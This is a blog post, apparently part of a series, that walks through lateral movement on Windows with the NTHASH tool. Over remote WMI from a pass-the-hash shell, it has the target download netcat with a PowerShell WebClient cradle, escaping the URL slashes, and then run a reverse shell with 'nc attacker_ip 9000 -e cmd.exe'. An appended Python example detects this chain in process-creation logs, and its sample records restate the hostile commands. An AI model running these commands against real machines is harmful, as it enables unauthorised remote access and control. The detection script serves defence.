Oct 29, 2019

This time, let's introduce a variant of the previous article.

Rather than copying a file to the target over the remote admin$ share (which is not always available), let's have the target download the file over HTTP.

1. Set up a netcat listener on the attacker host:
nc -L -vv -p 9000

2. Download a file from the internet on the remote target

(remember, you are running this from a pth shell with proper logon details).

NTHASH-win64.exe /runwmi /server:target /binary:powershell.exe -c (New-Object System.Net.WebClient).DownloadFile('http:%2f%2ferwan.labalec.fr%2fuploads%2fnc.exe','c:\temp\nc.exe');

Notice the %2f in place of the '/': the slashes have to be escaped, otherwise NTHASH would parse them as command-line switches.

3. Execute netcat on the target host:
NTHASH-win64.exe /runwmi /server:target /binary:c:\temp\nc.exe attacker_ip 9000 -e cmd.exe

At this point a shell pops up in your listening netcat.

Try a simple whoami for fun.
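From the defender's side, each of the three steps above leaves a distinct trace in process-creation telemetry: a shell whose parent is the WMI provider host (remote WMI execution), a WebClient download cradle in the command line, and netcat started with -e cmd.exe. The following is an added example, not part of the original post and not NTHASH code, showing how such records could be triaged. The log records are constructed for the example, the field names loosely follow Sysmon Event ID 1 (ParentImage, Image, CommandLine), and the host name and IP address are placeholders.

```python
"""Triage process-creation records for the WMI download-and-reverse-shell chain.

Added example (not from the original post, not NTHASH code). The events
below are constructed; field names loosely follow Sysmon Event ID 1.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


# A remote Win32_Process.Create call is serviced by the WMI provider host,
# so it appears as the parent of whatever was launched.
WMI_PROVIDER_HOST = "wmiprvse.exe"
SHELL_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
DOWNLOAD_CRADLES = ("downloadfile(", "downloadstring(", "invoke-webrequest", "iwr ")


def flag_event(ev: ProcessEvent) -> List[str]:
    """Return the reasons this event is suspicious (empty list if none)."""
    reasons: List[str] = []
    parent = _basename(ev.parent_image)
    image = _basename(ev.image)
    # Undo URL-escaped slashes (the %2f trick used to get the URL past an
    # argument parser) so that "http://" is matched either way.
    cmd = ev.command_line.lower().replace("%2f", "/")

    if parent == WMI_PROVIDER_HOST and image in SHELL_HOSTS:
        reasons.append("shell spawned by WMI provider host (remote WMI exec)")
    if any(c in cmd for c in DOWNLOAD_CRADLES) and ("http://" in cmd or "https://" in cmd):
        reasons.append("web download cradle in command line")
    if image == "nc.exe" or re.search(r"(^|\s)-e\s+(cmd|powershell)\.exe", cmd):
        reasons.append("netcat executing a shell (-e cmd.exe)")
    return reasons


def scan(events: List[ProcessEvent]) -> Dict[str, List[str]]:
    """Map each flagged command line to its list of reasons."""
    findings: Dict[str, List[str]] = {}
    for ev in events:
        reasons = flag_event(ev)
        if reasons:
            findings[ev.command_line] = reasons
    return findings


# Constructed sample telemetry: two records mirroring steps 2 and 3 of the
# post (placeholder host and IP), plus two benign records for contrast.
SAMPLE_EVENTS = [
    ProcessEvent(
        r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"powershell.exe -c (New-Object System.Net.WebClient).DownloadFile("
        r"'http:%2f%2ffiles.example.invalid%2fnc.exe','c:\temp\nc.exe');",
    ),
    ProcessEvent(
        r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        r"c:\temp\nc.exe",
        r"c:\temp\nc.exe 192.0.2.10 9000 -e cmd.exe",
    ),
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",
    ),
    ProcessEvent(
        r"C:\Windows\System32\svchost.exe",
        r"C:\Windows\System32\cmd.exe",
        r"cmd.exe /c ipconfig",
    ),
]

if __name__ == "__main__":
    for cmdline, why in scan(SAMPLE_EVENTS).items():
        print(cmdline)
        for reason in why:
            print("   ->", reason)
```

The parent-process check is the most robust of the three signals: WmiPrvSE.exe spawning an interactive shell is rare in normal operation, whereas the download-cradle and netcat patterns are string matches that a renamed binary or a different download helper would evade.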


One Response to "Demonstrating lateral movement with NTHASH Part #3"

1. […] let's again introduce a variant of the previous article. […]
